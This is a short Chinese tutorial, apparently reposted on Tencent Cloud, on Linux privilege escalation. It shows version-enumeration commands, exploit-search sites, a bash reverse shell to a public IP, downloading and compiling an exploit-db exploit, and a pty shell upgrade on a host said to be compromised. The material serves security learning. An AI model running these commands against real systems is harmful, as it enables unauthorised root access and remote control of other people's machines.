Linux提权学习

系统漏洞提权

1、获取操作系统版本号

2、根据版本号搜索exp

3、反弹shell

4、尝试利用

1、获取系统版本号:

获取发行版本

• cat /etc/issue

• cat /etc/*-release

• cat /etc/lsb-release

• cat /etc/redhat-release

获取内核版本

• cat /proc/version

• uname -a

• uname -mrs

• rpm -q kernel

• dmesg | grep Linux

• ls /boot | grep vmlinuz

2、搜索exp获取内核版本

• http://www.exploit-db.com

• http://1337day.com

• http://www.securiteam.com

• http://www.securityfocus.com

• http://www.exploitsearch.net

• http://metasploit.com/modules/

• http://securityreason.com

• http://seclists.org/fulldisclosure/

• http://www.google.com

3.反弹shell

自己主机使用nc监听端口

nc -l -p 8080

目标服务器运行

/bin/bash -i >& /dev/tcp/114.115.214.203/8888 0<&1

实例演示:

此时http://10.22.5.70/dahuiji.php 已经取得一个webshell

首先获取操作系统版本号

搜索exp

反弹shell

/bin/bash -i >& /dev/tcp/114.115.214.203/8888 0<&1

尝试利用exp

curl https://www.exploit-db.com/download/35370 > exp.c

gcc编译一下 exp.c 生成exp

gcc exp.c -o exp -lpthread

使用python -c ‘import pty; pty.spawn(“/bin/bash”)’ 增加交互的

python -c ‘import pty; pty.spawn(“/bin/bash”)’

效果

推荐阅读

记一次曲折的Linux提权

https://www.freebuf.com/column/188852.html

本文分享自微信公众号 - HACK学习呀(Hacker1961X)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-01-25

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏浪子编程走四方

都9102年了,还问GET和POST的区别

本篇文章只纯属于转载,转载内容只是部分内容并且格式未进行排版,只是为了给读者推荐而已,详情请点击文末左下角的阅读原文。

7120
来自专栏吟风者

Vue路由history模式踩坑记录:nginx配置解决404问题

vue-router 默认是hash模式,使用url的hash来模拟一个完整的url,当url改变的时候,页面不会重新加载。但是如果我们不想hash这种以#号结...

27720
来自专栏网络攻防实战知识交流

攻防世界新手练习Web writeup

http://111.198.29.45:31684/?a=1 post b=2

38920
来自专栏Eureka伽罗的技术时光轴

使用VS2012调试ReactOS源码

下载地址: http://msdn.microsoft.com/zh-cn/windows/hardware/hh852365

11120
来自专栏Eureka伽罗的技术时光轴

编写PC操作系统的参考资料(不断更新)

MASM 6.11,MASM 11(Windows):http://www.masm32.com/

23550
来自专栏网络攻防实战知识交流

攻防世界Web部分Wp

{"action":"buy","numbers":[true,true,true,true,true,true,true]}

51830
来自专栏浪子编程走四方

Nginx实现请求的负载均衡 + keepalived实现Nginx的高可用

使用集群是网站解决高并发、海量数据问题的常用手段。当一台服务器的处理能力、存储空间不足时,不要企图去换更强大的服务器,对大型网站而言,不管多么强大的服务器,都满...

14230
来自专栏志学Python

python爬虫scrapy模拟登录demo

背景:初来乍到的pythoner,刚开始的时候觉得所有的网站无非就是分析HTML、json数据,但是忽略了很多的一个问题,有很多的网站为了反爬虫,除了需要高可用...

21620
来自专栏码的一手好代码

CDH安装指南

SELinux是Security Enhance Linux的缩写,是NASA开发的一套严格的资源权限管理系统,由于使用起来比较复杂,所以一般选择关闭

36330
来自专栏吟风者

ubuntu 18.04 server下tomcat部署sprongboot项目

如果要将最终的打包形式改为war的话,还需要对pom.xml文件进行修改,因为spring-boot-starter-web中包含内嵌的tomcat容器,所以直...

12650

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励